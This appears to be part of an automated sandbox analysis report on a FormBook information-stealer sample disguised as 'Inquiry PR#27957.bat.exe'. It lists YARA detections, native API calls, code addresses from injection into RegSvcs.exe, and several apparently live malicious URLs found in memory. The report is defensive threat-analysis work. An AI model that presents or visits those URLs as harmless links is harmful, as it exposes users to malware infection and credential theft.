            Source: sfc.exe, 00000011.00000002.3790282223.0000000003D66000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.00000000031E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ventraip.com.au/favicon.ico
            Source: Inquiry PR#27957.bat.exe, fuqwoDzun.exe.0.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
            Source: sfc.exe, 00000011.00000003.1978545197.0000000007D18000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
            Source: sfc.exe, 00000011.00000002.3790282223.0000000004B88000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000004008000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.lexpaidshares.online/93w6/?lv-=V/q1FcXKAyKh7SGyOejAnJ1gdaJ4XypCrXBTkGu72NAGD53UqF3q83lE5
            Source: sfc.exe, 00000011.00000002.3790282223.0000000003BD4000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.0000000003054000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.2097655190.000000000D334000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.u9games.xyz/5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5
            Source: sfc.exe, 00000011.00000002.3790282223.000000000408A000.00000004.10000000.00040000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3789235628.000000000350A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.xn72dkd7scx.shop/emnz/?lv-=oBBn57UjS7mF6OBjtXCA4K/r3FCs

            E-Banking Fraud

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            .NET source code contains very large array initializations
            Source: 0.2.Inquiry PR#27957.bat.exe.7210000.4.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15142
            Source: 0.2.Inquiry PR#27957.bat.exe.2f4b620.1.raw.unpack, SizeParameters.csLarge array initialization: : array initializer size 15142
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042BDB3 NtClose,9_2_0042BDB3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662B60 NtClose,LdrInitializeThunk,9_2_01662B60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662DF0 NtQuerySystemInformation,LdrInitializeThunk,9_2_01662DF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662C70 NtFreeVirtualMemory,LdrInitializeThunk,9_2_01662C70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016635C0 NtCreateMutant,LdrInitializeThunk,9_2_016635C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01664340 NtSetContextThread,9_2_01664340
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01664650 NtSuspendThread,9_2_01664650
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662BE0 NtQueryValueKey,9_2_01662BE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662BF0 NtAllocateVirtualMemory,9_2_01662BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662BA0 NtEnumerateValueKey,9_2_01662BA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662B80 NtQueryInformationFile,9_2_01662B80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662AF0 NtWriteFile,9_2_01662AF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662AD0 NtReadFile,9_2_01662AD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662AB0 NtWaitForSingleObject,9_2_01662AB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662D30 NtUnmapViewOfSection,9_2_01662D30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662D00 NtSetInformationFile,9_2_01662D00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662D10 NtMapViewOfSection,9_2_01662D10
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662DD0 NtDelayExecution,9_2_01662DD0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662DB0 NtEnumerateKey,9_2_01662DB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662C60 NtCreateKey,9_2_01662C60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662C00 NtQueryInformationProcess,9_2_01662C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662CF0 NtOpenProcess,9_2_01662CF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662CC0 NtQueryVirtualMemory,9_2_01662CC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662CA0 NtQueryInformationToken,9_2_01662CA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662F60 NtCreateProcessEx,9_2_01662F60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662F30 NtCreateSection,9_2_01662F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662FE0 NtCreateFile,9_2_01662FE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662FA0 NtQuerySection,9_2_01662FA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662FB0 NtResumeThread,9_2_01662FB0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662F90 NtProtectVirtualMemory,9_2_01662F90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662E30 NtWriteVirtualMemory,9_2_01662E30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662EE0 NtQueueApcThread,9_2_01662EE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662EA0 NtAdjustPrivilegesToken,9_2_01662EA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01662E80 NtReadVirtualMemory,9_2_01662E80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01663010 NtOpenDirectoryObject,9_2_01663010
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01663090 NtSetValueKey,9_2_01663090
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016639B0 NtGetContextThread,9_2_016639B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01663D70 NtOpenThread,9_2_01663D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01663D10 NtOpenProcessToken,9_2_01663D10
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_02DB85B60_2_02DB85B6
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_02DB82100_2_02DB8210
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_02DB96D10_2_02DB96D1
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_02DB96300_2_02DB9630
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_02DB99580_2_02DB9958
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_0543A4200_2_0543A420
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_0543A4110_2_0543A411
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_05432F490_2_05432F49
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_05432F580_2_05432F58
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_05430B240_2_05430B24
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_0734B1700_2_0734B170
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073426D00_2_073426D0
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073426C00_2_073426C0
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073445E80_2_073445E8
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073445D80_2_073445D8
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073422980_2_07342298
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073422890_2_07342289
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073441B00_2_073441B0
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 0_2_073441AD0_2_073441AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004010009_2_00401000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0041695F9_2_0041695F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004169639_2_00416963
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004031809_2_00403180
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0042E3939_2_0042E393
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00401C4E9_2_00401C4E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_00401C509_2_00401C50
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040FC7A9_2_0040FC7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040FC839_2_0040FC83
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004045949_2_00404594
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004026269_2_00402626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_004026309_2_00402630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040FEA39_2_0040FEA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0040DF239_2_0040DF23
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B81589_2_016B8158
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016201009_2_01620100
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CA1189_2_016CA118
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E81CC9_2_016E81CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F01AA9_2_016F01AA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E41A29_2_016E41A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C20009_2_016C2000
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EA3529_2_016EA352
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F03E69_2_016F03E6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163E3F09_2_0163E3F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D02749_2_016D0274
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016B02C09_2_016B02C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016305359_2_01630535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F05919_2_016F0591
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E24469_2_016E2446
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D44209_2_016D4420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DE4F69_2_016DE4F6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016307709_2_01630770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016547509_2_01654750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162C7C09_2_0162C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164C6E09_2_0164C6E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016469629_2_01646962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016329A09_2_016329A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016FA9A69_2_016FA9A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163A8409_2_0163A840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016328409_2_01632840
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0165E8F09_2_0165E8F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016168B89_2_016168B8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EAB409_2_016EAB40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E6BD79_2_016E6BD7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162EA809_2_0162EA80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163AD009_2_0163AD00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CCD1F9_2_016CCD1F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0162ADE09_2_0162ADE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01648DBF9_2_01648DBF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630C009_2_01630C00
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01620CF29_2_01620CF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D0CB59_2_016D0CB5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A4F409_2_016A4F40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01672F289_2_01672F28
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01650F309_2_01650F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D2F309_2_016D2F30
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163CFE09_2_0163CFE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01622FC89_2_01622FC8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016AEFA09_2_016AEFA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01630E599_2_01630E59
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EEE269_2_016EEE26
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EEEDB9_2_016EEEDB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01642E909_2_01642E90
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016ECE939_2_016ECE93
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016FB16B9_2_016FB16B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166516C9_2_0166516C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161F1729_2_0161F172
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0163B1B09_2_0163B1B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E70E99_2_016E70E9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EF0E09_2_016EF0E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DF0CC9_2_016DF0CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016370C09_2_016370C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0161D34C9_2_0161D34C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E132D9_2_016E132D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0167739A9_2_0167739A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D12ED9_2_016D12ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164B2C09_2_0164B2C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016352A09_2_016352A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E75719_2_016E7571
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016F95C39_2_016F95C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CD5B09_2_016CD5B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016214609_2_01621460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EF43F9_2_016EF43F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EF7B09_2_016EF7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016756309_2_01675630
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E16CC9_2_016E16CC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016399509_2_01639950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164B9509_2_0164B950
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016C59109_2_016C5910
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0169D8009_2_0169D800
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016338E09_2_016338E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EFB769_2_016EFB76
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A5BF09_2_016A5BF0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0166DBF99_2_0166DBF9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164FB809_2_0164FB80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A3A6C9_2_016A3A6C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EFA499_2_016EFA49
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E7A469_2_016E7A46
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016DDAC69_2_016DDAC6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016CDAAC9_2_016CDAAC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01675AA09_2_01675AA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016D1AA39_2_016D1AA3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E7D739_2_016E7D73
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01633D409_2_01633D40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016E1D5A9_2_016E1D5A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0164FDC09_2_0164FDC0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016A9C329_2_016A9C32
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EFCF29_2_016EFCF2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EFF099_2_016EFF09
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F3FD59_2_015F3FD5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_015F3FD29_2_015F3FD2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_016EFFB19_2_016EFFB1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01631F929_2_01631F92
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01639EB09_2_01639EB0
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_00A9821010_2_00A98210
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_00A985B610_2_00A985B6
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_00A996D110_2_00A996D1
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_00A9963010_2_00A99630
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_00A9994210_2_00A99942
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_069126D010_2_069126D0
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_069145D810_2_069145D8
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_069145E810_2_069145E8
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_0691229810_2_06912298
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_06912B0810_2_06912B08
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_0691A36810_2_0691A368
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 10_2_0691918010_2_06919180
